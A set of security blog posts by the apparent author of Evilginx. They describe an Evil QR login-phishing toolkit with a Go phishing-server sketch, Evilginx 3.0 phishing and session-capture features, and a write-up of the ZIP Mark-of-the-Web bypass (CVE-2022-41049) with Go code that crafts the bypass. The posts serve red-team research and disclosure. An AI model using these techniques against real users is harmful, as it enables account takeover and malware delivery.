In the upcoming weeks, I want to show off a sneak peek of Evilginx Pro and outline all of its extra features. Evilginx Pro will be a paid product I want to distribute only to vetted red teaming companies around the world.

I will post more details when I'm ready!

If you are interested in how to protect against reverse proxy phishing, do check out the talk I gave this May at the x33fcon cybersecurity conference:

For now, stay tuned and you can always follow me on Twitter @mrgretzky.

Evil QR - Phishing With QR Codes

5 July 2023 at 14:31

Today I'm publishing research I started working on last year, but was too busy with the Evilginx Mastery course to publish at the time.

If you want a quick TL;DR rundown of what this blog post is about, check out the demo video I prepared:

Background

In recent years, I've noticed that more and more web applications have begun to offer a new way to sign in: QR code scanning. This method is especially convenient if you have a mobile app on your phone corresponding to the web application you are trying to sign into in your web browser.

Here are the most popular websites you can sign into, in any web browser, by scanning a QR code within the mobile application:

[Screenshots: QR code sign-in pages for Discord, Telegram, Whatsapp, Steam, TikTok and Binance]

To sign in, you open the mobile application, navigate to "Scan QR code" (usually residing somewhere within your profile settings) and scan the QR with your phone camera.

The QR code displayed on every sign-in page is nothing more than a dynamically generated session token, which you can authorize with your mobile application to pair it with your account.

Try to scan any of these QR codes with your phone's camera and you'll see the code translates into a unique string, usually presented in URL format. Here are several examples:

Discord:

https://discord.com/ra/GLt61XsN_fuakToqeSMV25pd3G-uwSbdScI1Zc9iwT8

Whatsapp:

2@o7Ugs+XwUVXgG2f8stGluhiItwCxbZJNLkpkeKEhz65GmPh6+/N1lp3fXpaSjxeARrE2JGXi3ikIFA==,it98cjNOA3qvp4i/TidKTeWZTrGkFUTnqsOzPPxFEzI=,AMV+jQ0gSnoFFKbuYzKdrDSPT7BVZ4R5iFxIGEbCqQI=,nVAlyqnDJiYfW/S1LzZoaVNsDm+pNaB1mGm8pGC0+/E=,1

Steam:

https://s.team/q/1/1711614348354244891

TikTok:

https://www.tiktok.com/t/ZGJXCraU8/

Binance:

https://www.binance.com/en/qr/93bd2ead7e504488bda81bf50deab7e8

Now let's imagine whether there is any potential way attackers could convince users to scan a QR code holding a session token they control.

Meet Evil QR Phishing aka QRLJacking

One day you receive an email telling you that you've been granted exclusive access to a private Discord server, where highly valuable information will be shared among the participants. All you need to do is open the attached link and scan the QR code with your Discord application.

You click the link and the following website shows up in your web browser:

[Screenshot: Phishing page deployed and hosted by the attacker]

Since you are pretty excited to join, you open your Discord application and scan the QR code showing up on the screen of your PC. Discord asks you to confirm whether you want to sign in using the scanned QR code. You think it makes sense that you need to be signed in to join the Discord server, so you agree without hesitation.

Once you approve the login attempt, the website redirects you to the Discord server page. You lose interest and go back to your other activities. All this without realizing that you've just given the attacker full access to your account.

What happened?

Here is the step-by-step process of what the attacker did to pull off this phishing attack, using the Evil QR toolkit.

  1. The attacker opens the official Discord login page within their web browser to generate the sign-in QR code.
  2. Using the Evil QR browser extension, the attacker is able to extract the sign-in QR code from the login page and upload it to the Evil QR server, where the phishing page is hosted.
  3. The phishing page, hosted by the attacker, dynamically displays the most recent sign-in QR code controlled by the attacker.

Once the target successfully scans the QR code, the attacker takes over the phished account.

The concept of phishing users with sign-in QR codes is not new: it was broadly documented by Mohamed Abdelbasset Elnouby (@SymbianSyMoh) from Seekurity back in 2016! I highly recommend you read this post, as it covers a lot of information about the potential attack vectors that could be used to pull off such attacks.

The technique was later officially recognized as QRLJacking, and @SymbianSyMoh also released a QRLJacker tool in 2020 to demonstrate how such attacks can be executed. Evil QR is just a spin-off of the same idea.

Evil QR Toolkit

To demonstrate this interesting phishing technique, I've developed a set of proof-of-concept tools.

You can find the open-sourced Evil QR toolkit on my GitHub if you're interested in trying it out yourself.

As you can see below, the Evil QR attack can be customized using personalized phishing pre-text, with dynamic updates, for every website separately. The Evil QR browser extension can detect and extract QR codes within websites, no matter how they are rendered.

The extension supports extracting QR codes rendered as CANVAS, IMG, SVG or even DIV (by taking a screenshot with the html2canvas library).


Evil QR Server

The server is developed in Go. Its main purpose is to expose a REST API for the browser extension and to run an HTTP server hosting the phishing page.

It awaits authenticated communication from the browser extension, including the QR code image with metadata, in JSON format, on the /qrcode/[qr_uuid] endpoint:

{
    "id": "11111111-1111-1111-1111-111111111111",
    "source": "data:image/png;base64,iVBORw0K...",
    "host": "discord.com"
}

The retrieved QR code is then stored and made available for retrieval by the JavaScript running on the phishing page. The phishing page uses HTTP long polling to retrieve QR code updates with minimal delay, without having to use WebSockets.

The phishing page automatically detects which hostname the QR code was retrieved from and can dynamically adjust its CSS and text content to change the phishing pre-text, for social engineering purposes.
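
The full source is in the GitHub repository, but the server's core boils down to two handlers: one accepting QR updates from the extension and one long-polling them out to the phishing page. A stripped-down sketch (the /poll path and the omission of authentication are simplifications of mine):

package main

import (
	"encoding/json"
	"net/http"
	"sync"
	"time"
)

// qrUpdate mirrors the JSON structure shown above.
type qrUpdate struct {
	ID     string `json:"id"`
	Source string `json:"source"` // data: URI with the QR image
	Host   string `json:"host"`
}

var (
	mu     sync.Mutex
	latest qrUpdate
	notify = make(chan struct{})
)

// handleUpload stores the newest QR code and wakes all long-polling pages.
func handleUpload(w http.ResponseWriter, r *http.Request) {
	var u qrUpdate
	if err := json.NewDecoder(r.Body).Decode(&u); err != nil {
		http.Error(w, "bad request", http.StatusBadRequest)
		return
	}
	mu.Lock()
	latest = u
	close(notify) // release every waiting poller
	notify = make(chan struct{})
	mu.Unlock()
}

// handlePoll is the long-polling endpoint the phishing page queries.
func handlePoll(w http.ResponseWriter, r *http.Request) {
	mu.Lock()
	ch := notify
	mu.Unlock()
	select {
	case <-ch:
		mu.Lock()
		u := latest
		mu.Unlock()
		json.NewEncoder(w).Encode(u)
	case <-time.After(25 * time.Second):
		w.WriteHeader(http.StatusNoContent) // page simply polls again
	}
}

func main() {
	http.HandleFunc("/qrcode/", handleUpload) // extension POSTs here
	http.HandleFunc("/poll", handlePoll)      // phishing page polls here
	http.ListenAndServe(":8080", nil)
}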

Evil QR Browser Extension


The extension is used solely by the attacker, and it needs to be enabled on the sign-in page of the web application the target is being phished for. It will automatically find the QR code image and detect when it changes. Once it changes, it will upload the updated image to the Evil QR server.

One of the most important characteristics of session tokens represented by sign-in QR codes is that the tokens are short-lived by design. Every token expires after approximately 30 seconds, which drastically shortens the time frame of the token's validity. Once the token expires, the website regenerates it and updates the QR code displayed on the sign-in page.

If sign-in session tokens did not expire, attackers would hypothetically be able to print out the QR codes on physical pieces of paper and send them as phishing leaflets to potential victims.

Some websites will stop updating QR codes after a certain period of inactivity, to save bandwidth. When this happens, they will usually display a "Retry" button of some sort, which the extension can automatically detect and click, so the process of updating QR codes is not interrupted.

The extension can also detect the presence of a specific DOM object, which shows up only when the attacker is signed in after a successful phishing attempt. It will then send an update to the Evil QR server with an authorized: "true" parameter, allowing the phishing page to decide how to proceed.

How serious is this?

In my personal opinion: not that serious. For a QRLJacking phishing attack to be successful, a lot of prerequisites have to be met prior to the attack taking place. Nevertheless, it was a very fun project to work on.

The classic phishing attacks, focused on capturing credentials and session tokens to bypass multi-factor authentication, are still much more dangerous than this one and they can be executed on a much larger scale using a tool like Evilginx for example.

I think the most realistic scenario for pulling off QRLJacking phishing would be to set up a phishing page with a QR code on display on an external device deployed in public, like a tablet or TV screen. Once one person successfully signs in by scanning a QR code, the attacker's Evil QR setup would save the captured session for later and reload the sign-in page to generate a new QR code to phish another user.

That could in theory make it possible to phish a larger number of users, one at a time. I don't think QRLJacking phishing is a viable technique when sending phishing links via e-mail or other mediums. These days most people read incoming messages on their mobile phones and once the phishing page with a QR code shows up on their phone's screen, it is impossible to use the same phone's camera to scan it.

To summarize, here is a list of all the pros and cons of executing this phishing attack technique that I could think of:

Pros:

  • No need for the target to enter their username and password.
  • Could be potentially pulled off in public areas, having an external device displaying a phishing QR code, on display.

Cons:

  • Target needs to have the mobile app pre-installed for the given service.
  • Attacks are hard to pull off on a wider scale, since a separate QR code has to be generated for every target.
  • It is usually pretty hard to find the setting to scan QR codes within mobile applications, involving multiple clicks, with every click lowering the chance of a successful social engineering attempt.
  • If a phishing page is opened on a mobile phone, there is no way for the target to scan the QR code with the same mobile phone.

Closing thoughts

I decided not to implement this attack vector in the Evilginx phishing framework, since Evilginx is already powerful on its own.

While sign-in QR codes displayed on phishing pages reverse proxied by Evilginx will not let you sign in by scanning them, due to the hostname mismatch, it is still possible to patch the JavaScript code that generates them to make them work on phishing pages.

If you're interested in learning more about reverse proxy phishing to bypass MFA, check out my Evilginx Mastery video course, which will teach you everything you need to know to perform successful red team phishing engagements.

Till next time!

Evilginx 3.0 + Evilginx Mastery

10 May 2023 at 09:16

This post has been long coming and I'm glad to finally be able to make it happen!

Today I'm finally releasing Evilginx 3.0, together with the Evilginx Mastery online course, into which I've poured everything I know about Evilginx and how to use it in the most effective manner.

Evilginx hasn't seen any updates for nearly two and a half years. That's why it was a great surprise to me to hear that, even though I hadn't released any updates, a lot of red teamers still use this tool for phishing simulations, with many successes. I've been amazed to come across some great posts about Evilginx, like the ones by Jan Bakker, Jeffrey Appel or Pepe Berba.

Talking to people in the industry motivated me to give Evilginx a quality-of-life refresher, in order to build stronger foundations for future updates. It's been nearly six years since I released the first version of Evilginx, which was nothing more than a Lua script for a custom version of nginx. Back then, I couldn't have foreseen the great reception the tool would receive over the years.

It's a fact that a lot of people have been struggling to figure out how to properly use Evilginx or create their own phishlets. The lack of official documentation or guides didn't help, and you could only get so far analyzing public phishlets and trying to figure out how they work through trial & error.

Additionally, to my surprise, in recent years not many websites have attempted to develop their own detections for reverse proxy phishing. I have to hand it to Google and Microsoft, as they seem to be among the few companies doing anything to protect their users against reverse proxy phishing.

All this will hopefully change today. Here is, in detail, what I've been working on for the past year and what I'm releasing to the public today:

Evilginx Mastery Course

The public version of Evilginx will always remain open-source and free to use. You can use the tool as you see fit. To fund further development, I decided to publish a paid online course, through which I can share everything I know about Evilginx, along with hands-on, step-by-step video footage showing how I personally use it.

Big thanks to SEKTOR7 and Rasta Mouse for encouraging me to take a shot at creating an Evilginx course.

The course is also prepared with defenders in mind. Seeing how little websites do nowadays to protect against reverse proxy phishing, I've included tips on what defenders can do to make reverse proxy phishing attacks extremely hard or nearly impossible to pull off.

If you decide to purchase the course, thank you in advance. Keep in mind that it greatly helps me continue working on Evilginx and is a great contribution to my motivation.

If you plan to purchase access to the course for multiple employees in your company, please contact me directly at [email protected] and we can work out a discount.

You can buy the course online and watch the lessons, at your own pace, whenever you want: Evilginx Mastery - Reverse Proxy MFA Phishing Guide For Red Teams

To learn more about the course, take a look at my attempt at a promotional video. And yes, I know how to blink :D

Evilginx 3.0

This version does not deliver big flashy features; rather, it serves as a quality-of-life update. I've fixed numerous issues that had been lingering in Evilginx for a long time and updated some mechanics to make the tool work better than before.

GitHub: https://github.com/kgretzky/evilginx2

Here are some highlights of what has changed:

Improved TLS certificate management

I've ditched the old Go library for managing LetsEncrypt certificates and switched to the well-maintained certmagic library. This change allows automated retrieval of TLS certificates from LetsEncrypt to happen more efficiently, and, most importantly, Evilginx will now automatically renew expiring certificates, so you won't ever have to worry about your phishing campaigns expiring without warning.

Session tokens can now be extracted from response bodies or HTTP headers

Ever since Evilginx was released, I had only considered a single scenario, in which session tokens are transmitted as HTTP cookies. Over the years, I've learned this approach was wrong, as it is becoming more and more common for session tokens to be retrieved in JSON packets and later stored as LocalStorage values. This is now especially common practice with web applications relying heavily on JavaScript functionality, like messenger applications.

It is now possible to look for session tokens in HTTP response bodies or in the contents of HTTP headers, like the Authorization header.

I've covered how to handle such a scenario in one of the training labs from the Evilginx Mastery course.

Example phishlets no longer available in main repository

My main goal has always been to deliver a reverse proxy phishing framework for red teamers. The provided example phishlets were always meant to serve as learning material for making your own phishlets. Keeping them updated was honestly an impossible feat. This is why I've made the decision to cease support for example phishlets in the main Evilginx repository.

Phishlets get outdated and stop working relatively fast, and I always wanted to focus on developing the framework, rather than keeping the example phishlets constantly up-to-date. I encourage everyone to set up their own repositories with phishlets they want to share with the community. My priority now is to put effort into teaching people how to create their own phishlets.

Once I find contributors who may want to work on phishlets for fun, I may set up a new repository just for aggregating working and tested phishlets made by others, and later have it integrated somehow with Evilginx installations.

Phishing pages can now be embedded within iframes

A few months ago, the legendary mr.d0x released amazing research on BITB (browser-in-the-browser) phishing, where you create a fake popup window with JavaScript, showing a spoofed URL in a fake address bar. I liked the idea so much that I really wanted to see it working with Evilginx.

Displaying phishing pages in iframes turned out not to be supported by default. Now you can fully enjoy displaying your phishing page within iframes. Just make sure to fully rewrite the default BITB templates, as they have been heavily flagged by Google as malicious content.

Also make sure to check out mr.d0x's courses on Malware Development!

Configuration format changed to JSON

The Evilginx configuration file was originally stored in YAML format. JSON, overall, is a much better option, with its syntax being easier to use than YAML, but maybe a bit harder to read. Nevertheless, with the config file in JSON format, it will be easier to write custom deployment scripts that dynamically generate configuration files.

Phishlets will remain in YAML format.

Phishing sessions are now always created when a valid lure URL is opened

Evilginx whitelists the IP address of every target who makes a request to a valid lure URL. This is required to later allow the proxying of requests that cannot contain Evilginx session cookies, due to web browsers not allowing some requests to transmit cookies.

A bug in Evilginx prevented the creation of new reverse proxy sessions for valid lure URL requests coming from IP addresses that had already been whitelisted.

In the 3.0 update, every time a target opens a valid lure URL, they will be assigned a new reverse proxy session. This fix will also make it possible to properly track the clicks on your lure URLs.

Child phishlets derived from phishlet templates

One of the problematic issues Evilginx users have encountered was targeting websites hosted under customized hostnames.

Say you wanted to target a specific company's Okta portal, hosted on the evilcorp.okta.com domain. To target custom domains, you'd have to manually edit the phishlet file and hardcode evilcorp.okta.com into it.

With the phishlet templates feature, instead of having to modify a phishlet file manually every time you need to target a different hostname, you can create a phishlet template for Okta, setting up a placeholder for custom variables in your phishlet file, e.g. {subdomain}.okta.com.

With such a template, whenever you need to target a specific hostname, you can create a child phishlet as a derivative of your phishlet template and specify, for example, subdomain=evilcorp. The created child phishlet can then be used as a normal phishlet with its own personalized setup.

You can learn how to create and use phishlet templates in my Evilginx Mastery course, as well.

URL redirection with JavaScript

Originally, when all session tokens had been successfully captured, Evilginx would redirect the user to the preconfigured redirect_url through an HTTP Location header. I found this solution not ideal, since it exposed the phishing URL to the destination website, through the Referer header, when the redirection took place.

Since 3.0, the redirection happens via JavaScript injected into the text/html content of the next web page loaded after all session tokens have been captured. This approach avoids populating the Referer header with your phishing URL. One issue remains: redirecting the user when the website does not load any new pages after a successful sign-in. I will try to tackle this in future updates.

License changed from GPL to BSD-3

In short: GPL requires redistributing the tool with full source code, while BSD-3 is more permissive, allowing redistribution of the tool without it.

Changelog

The full changelog for Evilginx 3.0 is as follows:

  • Feature: TLS certificates from LetsEncrypt will now get automatically renewed.
  • Feature: Automated retrieval and renewal of LetsEncrypt TLS certificates is now managed by certmagic library.
  • Feature: Authentication tokens can now be captured not only from cookies, but also from response body and HTTP headers.
  • Feature: Phishing pages can now be embedded inside of iframes.
  • Feature: Changed redirection after successful session capture from Location header redirection to injected Javascript redirection.
  • Feature: Changed config file from config.yaml to config.json, permanently changing the configuration format to JSON.
  • Feature: Changed open-source license from GPL to BSD-3.
  • Feature: Added always modifier for capturing authentication cookies, forcing to capture a cookie even if it has no expiration time.
  • Feature: Added phishlet <phishlet> command to show details of a specific phishlet.
  • Feature: Added phishlet templates, allowing to create child phishlets with custom parameters like a pre-configured subdomain or domain. Parameters can be defined anywhere in the phishlet file as {param_name} and every occurrence will be replaced with the pre-configured parameter values of the created child phishlet.
  • Feature: Added phishlet create command to create child phishlets from template phishlets.
  • Feature: Renamed lure templates to lure redirectors due to name conflict with phishlet templates.
  • Feature: Added {orig_hostname} and {orig_domain} support for sub_filters phishlet setting.
  • Feature: Added {basedomain} and {basedomain_regexp} support for sub_filters phishlet setting.
  • Fixed: One target can now have multiple phishing sessions active for several different phishlets.
  • Fixed: Cookie capture from an HTTP response will no longer stall mid-way on missing optional cookies when all authentication cookies are already captured.
  • Fixed: trigger_paths regexps will now match the full string, instead of triggering when just part of it is detected in the URL path.
  • Fixed: Phishlet table rows are now sorted alphabetically.
  • Fixed: Improved phishing session management to always create a new session when lure URL is hit if session cookie is not present, even when IP whitelist is set.
  • Fixed: WebSocket connections are now properly proxied.

Evilginx Online Documentation

As Evilginx kept growing, it became harder and harder to keep up with all the features. The GitHub Wiki kind of worked, at least to provide documentation for the latest phishlet format, but I've never been fully satisfied with it.

I've always wanted the documentation to be easily accessible, well structured, easy to navigate and to have a quality look & feel. I can happily say I may have found the perfect solution in Docusaurus.

From today, the most up-to-date Evilginx documentation will always be accessible through one official URL: https://help.evilginx.com

Check it out!

I honestly think that, with Evilginx now having proper documentation, it will become much easier for everyone to use. I strongly hope you make good use of it! I often use it myself when I forget how the tool I made is supposed to work :P

Closing thoughts

The last 6 years have been a wild ride and I can't thank everyone enough for giving Evilginx a shot. I never expected that a tool based on such a simple idea would eventually become one people use at work, to simulate phishing attacks. Mention of Evilginx even made it to TechCrunch, at one point.

I really hope Evilginx will continue to serve its purpose in aiding you during your phishing engagements. Thank you, again, and if you decide to give the Evilginx Mastery course a try, accept my eternal gratitude!

To end with a cliffhanger, I will say that the Evilginx story is not over and there may be an Evilginx Pro in the works, with some special features I decided to keep private for now. The pro version will most likely be licensed only to cybersecurity companies. Some of you may find mentions of these private features in the official online documentation.

For updates follow me on Twitter @mrgretzky and Mastodon @[email protected].

If you have any inquiries about company discounts or if you require any custom functionality in Evilginx, you can always contact me directly at: [email protected].

As always - enjoy and stay tuned!


Exploring ZIP Mark-of-the-Web Bypass Vulnerability (CVE-2022-41049)

8 November 2022 at 20:12
Exploring ZIP Mark-of-the-Web Bypass Vulnerability (CVE-2022-41049)

In October 2022, I came across a tweet from July 5th by @wdormann, who reported the discovery of a new method for bypassing MOTW, using a flaw in how Windows handles file extraction from ZIP files.

So if it were a ZIP instead of ISO, would MotW be fine?
Not really. Even though Windows tries to apply MotW to extracted ZIP contents, it's really quite bad at it.
Without trying too hard, here I've got a ZIP file where the contents retain NO protection from Mark of the Web. pic.twitter.com/1SOuzfca5q

โ€” Will Dormann (@wdormann) July 5, 2022

This sounded to me like a nice challenge to freshen up my rusty RE skills. The bug was also a 0-day at the time: it had already been reported to Microsoft, with no fix deployed for more than 90 days.

What I always find most interesting about vulnerability research write-ups is the process of how the bug was found, what tools were used and what approach was taken. I wanted this post to be like that.

Now that the vulnerability has been fixed, I can freely publish the details.

Background

What I found out, based on public information about the bug and demo videos, was that Windows, somehow, does not append MOTW to files extracted from ZIP files.

Mark-of-the-Web is really just another file attached as an Alternate Data Stream (ADS) named Zone.Identifier, and it is only available on NTFS filesystems. The ADS file always contains the same content:

[ZoneTransfer]
ZoneId=3

For example, when you download a ZIP file, file.zip, from the Internet, the browser will automatically add the file.zip:Zone.Identifier ADS to it, with the above contents, to indicate that the file has been downloaded from the Internet and that Windows needs to warn the user of any risks involving this file's execution.
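Since ADS paths are addressed with a colon, you can inspect or recreate the marker yourself. Here is a small Go sketch (Windows/NTFS only; it assumes file.zip already exists in the working directory) that writes and reads back the Zone.Identifier stream:

package main

import (
	"fmt"
	"os"
)

func main() {
	// Write the Mark-of-the-Web marker into the Zone.Identifier ADS.
	motw := "[ZoneTransfer]\r\nZoneId=3\r\n"
	if err := os.WriteFile("file.zip:Zone.Identifier", []byte(motw), 0644); err != nil {
		fmt.Println("write failed:", err)
		return
	}
	// Read it back, the same way any MOTW-aware application would.
	data, err := os.ReadFile("file.zip:Zone.Identifier")
	if err != nil {
		fmt.Println("read failed:", err)
		return
	}
	fmt.Print(string(data))
}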

This is what happens when you try to execute a file, like a JScript script, by double-clicking it from inside a ZIP file with MOTW attached.

Exploring ZIP Mark-of-the-Web Bypass Vulnerability (CVE-2022-41049)

Clearly the user would think twice before opening it when such a popup shows up. This is not the case, though, for specially crafted ZIP files bypassing that feature.

Let's find the cause of the bug.

Identifying the culprit

What I knew already from my observations was that the bug was triggered when the explorer.exe process handles the extraction of ZIP files. I figured the process must be using some internal Windows library for unpacking ZIP files and I was not mistaken.

Exploring ZIP Mark-of-the-Web Bypass Vulnerability (CVE-2022-41049)

ProcessHacker revealed the zipfldr.dll module loaded within the Explorer process and it looked like a good starting point. I booted up IDA, with symbols conveniently provided by Microsoft, to look around.

The ExtractFromZipToFile function immediately caught my attention. I created a sample ZIP file with a packaged JScript file for testing, which had a single instruction:

WScript.Echo("YOU GOT HACKED!!1");

I then added a MOTW ADS file with Notepad and filled it with the MOTW contents mentioned above:

notepad file.zip:Zone.Identifier

I loaded up the x64dbg debugger, attached it to explorer.exe and set up a breakpoint on ExtractFromZipToFile. When I double-clicked the JS file, the breakpoint triggered and I could confirm I was on the right path.

CheckUnZippedFile

One of the function calls I noticed nearby revealed an interesting pattern in IDA. Right after the file is extracted and specific conditions are met, the CheckUnZippedFile function is called, followed by a call to _OpenExplorerTempFile, which opens the extracted file.

Exploring ZIP Mark-of-the-Web Bypass Vulnerability (CVE-2022-41049)

Having a hunch that CheckUnZippedFile is the function responsible for adding MOTW to the extracted file, I nopped its call and found that I stopped getting the MOTW warning popup when I tried executing a JScript file from within the ZIP.

It was clear to me that if I managed to manipulate the execution flow in such a way that the branch executing this function was skipped, I would be able to achieve the desired effect of bypassing the creation of MOTW on extracted files. I looked into the function to investigate further.

I noticed that CheckUnZippedFile tries to combine the TEMP folder path with the filename extracted from the ZIP file, and when that call fails, the function quits, skipping the creation of the MOTW file.

Exploring ZIP Mark-of-the-Web Bypass Vulnerability (CVE-2022-41049)

Considering that I controlled the filename of the extracted ZIP file, I could possibly manipulate its content to make PathCombineW fail and, as a result, achieve my goal.

PathCombineW turned out to be a wrapper around the PathCchCombineExW function, with the output buffer size limit set to a fixed value of 260 bytes. I thought that if I managed to create a really long filename or use some special characters, which would be ignored by the function handling the file extraction but would make the length check in CheckUnZippedFile fail, it could work.

I opened 010 Editor, which I highly recommend for any kind of hex editing work, and loaded my sample ZIP file with the built-in ZIP template.

Exploring ZIP Mark-of-the-Web Bypass Vulnerability (CVE-2022-41049)

I spent a few hours testing different filename lengths and different special characters, just to see if the extraction function would behave in an erratic way. Unfortunately, I found out that there was another path length check, performed prior to the one I had been investigating. It triggered much earlier and prevented me from exploiting this one specific check. I had to start over and consider this path a dead end.

I looked for any controllable branching conditions that would result in not triggering the call to CheckUnZippedFile at all, but none of them seemed to depend on any of the internal ZIP file parameters. I then looked deeper into the CheckUnZippedFile function and found out that when the PathCombineW call succeeds, it creates a CAttachmentServices COM object, which has three of its methods called:

CAttachmentServices::SetReferrer(unsigned short const * __ptr64)
CAttachmentServices::SetSource(unsigned short const * __ptr64)
CAttachmentServices::SaveWithUI(struct HWND__ * __ptr64)

I realized I was about to go deep down a rabbit hole and might spend much longer there than a hobby project like this should require. I had to get a public exploit sample to speed things up.

Huge thanks to @bohops & @bufalloveflow for all the help in getting the sample!

Detonating the live sample

I managed to copy over all the relevant ZIP file parameters from the obtained exploit sample into my test sample and confirmed that MOTW was gone when I extracted the sample JScript file.

I decided to dig deeper into the SaveWithUI COM method to find the exact place where the creation of the Zone.Identifier ADS fails. Navigating through shdocvw.dll, I ended up in urlmon.dll with a failing call to WritePrivateProfileStringW.

Exploring ZIP Mark-of-the-Web Bypass Vulnerability (CVE-2022-41049)

This is the Windows API function for handling the creation of INI configuration files. Considering that the Zone.Identifier ADS file is an INI file containing the ZoneTransfer section, it was definitely relevant. I dug deeper.

The search led me to the final call of NtCreateFile, trying to create the Zone.Identifier ADS file, which failed with an ACCESS_DENIED error when using the exploit sample and succeeded when using the original, untampered test sample.

Exploring ZIP Mark-of-the-Web Bypass Vulnerability (CVE-2022-41049)

It looked like the majority of parameters were constant, as you can see in the screenshot above. The only place where I'd expect anything dynamic was in the structure of the ObjectAttributes parameter. After closer inspection and half an hour of carefully comparing the contents of the parameter structures from the two calls, I concluded that both the failing and the succeeding call used exactly the same parameters.

This led me to realize that something I did not account for had to be happening prior to the creation of the ADS file. There was no better way to figure that out than to use Process Monitor, which, honestly, I should've used long before I even opened IDA ๐Ÿ˜›.

Backtracking

I set up my filters to only list file operations related to files extracted to the TEMP directory, with filenames starting with the Temp prefix.

Exploring ZIP Mark-of-the-Web Bypass Vulnerability (CVE-2022-41049)

The test sample clearly succeeded in creating the Zone.Identifier ADS file:

Exploring ZIP Mark-of-the-Web Bypass Vulnerability (CVE-2022-41049)

While the exploit sample failed:

Exploring ZIP Mark-of-the-Web Bypass Vulnerability (CVE-2022-41049)

Comparing these two listings, I could not see any drastic differences. I exported the results as text files and compared them in a text editor. That's when I could finally spot it.

Prior to creating the Zone.Identifier ADS file, a call to SetBasicInformationFile was made with FileAttributes set to RN.

Exploring ZIP Mark-of-the-Web Bypass Vulnerability (CVE-2022-41049)

I looked up what that R attribute was, the one apparently not set for files extracted from the original test sample, and then...

Exploring ZIP Mark-of-the-Web Bypass Vulnerability (CVE-2022-41049)
Facepalm

The R file attribute stands for read-only. The file stored in the ZIP has the read-only attribute set and that attribute is carried over to the file extracted from it. Obviously, when Windows tries to attach the Zone.Identifier ADS to it, the operation fails with an ACCESS_DENIED error, since the file is read-only and any write operation on it will fail.

It doesn't even seem to be a bug, since everything is working as expected ๐Ÿ˜›. The file attributes in a ZIP file are set in the ExternalAttributes parameter of the ZIPDIRENTRY structure and its values correspond to the MS-DOS file attributes carried over from the MS-DOS era, as stated in the ZIP file format documentation I found online.

   4.4.15 external file attributes: (4 bytes)

       The mapping of the external attributes is
       host-system dependent (see 'version made by').  For
       MS-DOS, the low order byte is the MS-DOS directory
       attribute byte.  If input came from standard input, this
       field is set to zero.

   4.4.2 version made by (2 bytes)

        4.4.2.1 The upper byte indicates the compatibility of the file
        attribute information.  If the external file attributes 
        are compatible with MS-DOS and can be read by PKZIP for 
        DOS version 2.04g then this value will be zero.  If these 
        attributes are not compatible, then this value will 
        identify the host system on which the attributes are 
        compatible.  Software can use this information to determine
        the line record format for text files etc.  

        4.4.2.2 The current mappings are:

         0 - MS-DOS and OS/2 (FAT / VFAT / FAT32 file systems)
         1 - Amiga                     2 - OpenVMS
         3 - UNIX                      4 - VM/CMS
         5 - Atari ST                  6 - OS/2 H.P.F.S.
         7 - Macintosh                 8 - Z-System
         9 - CP/M                     10 - Windows NTFS
        11 - MVS (OS/390 - Z/OS)      12 - VSE
        13 - Acorn Risc               14 - VFAT
        15 - alternate MVS            16 - BeOS
        17 - Tandem                   18 - OS/400
        19 - OS X (Darwin)            20 thru 255 - unused

        4.4.2.3 The lower byte indicates the ZIP specification version 
        (the version of this document) supported by the software 
        used to encode the file.  The value/10 indicates the major 
        version number, and the value mod 10 is the minor version 
        number.  

Changing the value of the external attributes to anything with the lowest bit set, e.g. 0x21 or 0x01, effectively makes the extracted file read-only, leaving Windows unable to create MOTW for it after extraction.
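For anyone who wants to reproduce the behavior, here is a short Go sketch using the standard archive/zip package, which writes a ZIP entry with the MS-DOS read-only bit set in its external attributes. The archive and entry names are just examples:

package main

import (
	"archive/zip"
	"log"
	"os"
)

func main() {
	f, err := os.Create("readonly.zip")
	if err != nil {
		log.Fatal(err)
	}
	defer f.Close()

	zw := zip.NewWriter(f)
	hdr := &zip.FileHeader{
		Name:   "calc.js",
		Method: zip.Deflate,
		// The low-order byte of the external attributes is the MS-DOS
		// attribute byte; bit 0 (0x01) is the read-only flag.
		ExternalAttrs: 0x01,
	}
	w, err := zw.CreateHeader(hdr)
	if err != nil {
		log.Fatal(err)
	}
	w.Write([]byte(`WScript.Echo("YOU GOT HACKED!!1");`))
	if err := zw.Close(); err != nil {
		log.Fatal(err)
	}
}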

Conclusion

I honestly expected the bug to be much more complicated and I definitely shot myself in the foot by getting too excited and starting up IDA instead of running Process Monitor first. I started with IDA as I didn't have an exploit sample in the beginning and was hoping to find the bug through code analysis. Bottom line, I managed to learn something new about Windows internals and how the extraction of ZIP files is handled.

As a bonus, Mitja Kolsek from 0patch asked me to confirm if their patch worked and I was happy to confirm that it did!

Nice work. Care to verify that our micropatches fix this? (A free 0patch account suffices.) https://t.co/us8FVWczXk

โ€” Mitja Kolsek (@mkolsek) November 1, 2022

The patch was clean and reliable as seen in the screenshot from a debugger:

Exploring ZIP Mark-of-the-Web Bypass Vulnerability (CVE-2022-41049)

I've also been able to have a nice chat with Will Dormann, who initially discovered this bug, and his story of how he found it is hilarious:

I merely wanted to demonstrate how an exploit in a ZIP was safer (by way of prompting the user) than that *same* exploit in an ISO. So how did I make the ZIP? I:
1) Dragged the files out of the mounted ISO
2) Zipped them. That's it. The ZIP contents behaved the same as the ISO.

Every mounted ISO image lists all of its files as read-only. Dragging & dropping files from a read-only partition to a different one preserves the read-only attribute on the created files. This is how Will managed to unknowingly trigger the bug.

Will also made me realize that the 7-Zip extractor, even though its developers announced they had begun adding MOTW to every file extracted from a MOTW-marked archive, does not add MOTW by default; the feature has to be enabled manually.

Exploring ZIP Mark-of-the-Web Bypass Vulnerability (CVE-2022-41049)

I mention this as it may explain why MOTW is not always considered a valid security boundary. Vulnerabilities related to it may be given low priority and even be ignored by Microsoft for 90 days.

When 7-Zip announced support for MOTW in June, I honestly took it for granted that it would be enabled by default, but apparently the developer doesn't know exactly what he is doing.

I haven't yet analyzed how the patch made by Microsoft works, but do let me know if you have and I will gladly update this post with additional information.

Hope you enjoyed the write-up!

Hacked Discord - Bookmarklet Strikes Back

31 August 2022 at 10:00
Hacked Discord - Bookmarklet Strikes Back

For the past couple of months, I've been hearing about increasing numbers of account takeover attacks in the Discord community. Discord has somehow become the de facto official messenger among the cryptocurrency community, with new channels oriented around NFTs popping up like mushrooms.

Hacking Discord accounts has suddenly become a very lucrative business for cybercriminals, who are going in for the kill, to make some easy money. They take over admin accounts in cryptocurrency-oriented communities to spread malware and launch further social engineering attacks. My focus is going to be purely on Discord account security, which should be of concern to everyone using Discord.

In recent weeks I thought the attackers were using some new reverse-proxy phishing technique to hijack WebSocket sessions, with tools similar to Evilginx, but the hacks I discovered are in reality much easier to execute than I anticipated.

